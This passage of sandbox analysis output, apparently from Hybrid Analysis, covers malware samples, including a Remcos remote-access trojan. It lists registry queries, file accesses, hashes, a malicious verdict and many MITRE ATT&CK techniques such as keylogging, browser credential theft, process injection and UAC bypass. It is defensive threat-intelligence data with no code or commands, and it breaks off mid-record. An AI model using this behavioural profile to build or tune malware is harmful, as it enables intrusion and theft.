\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"F1963F22FF5E0275AD5E3F5EC43472DD7C05B3D1B65851D64C6F4AAF1D85E436\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" trying to touch file \"C:\\f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436.exe\" trying to touch file \"%WINDIR%\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has a section named \"UPX0\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has a section named \"UPX1\"\n \"f1963f22ff5e0275ad5e3f5ec43472dd7c05b3d1b65851d64c6f4aaf1d85e436\" has a section named \"UPX2\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8
https://hybrid-analysis.com/sample/1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8
Hybrid Analysis - Remcos
{"size": 500736, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8", "sha256": "1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8", "av_detect": 88, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 1, "total_signatures": 168, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 318}, "processes": [{"uid": "00000000-00005260", "name": "1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe", "normalized_path": "C:\\1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe", "sha256": "1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 16}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", 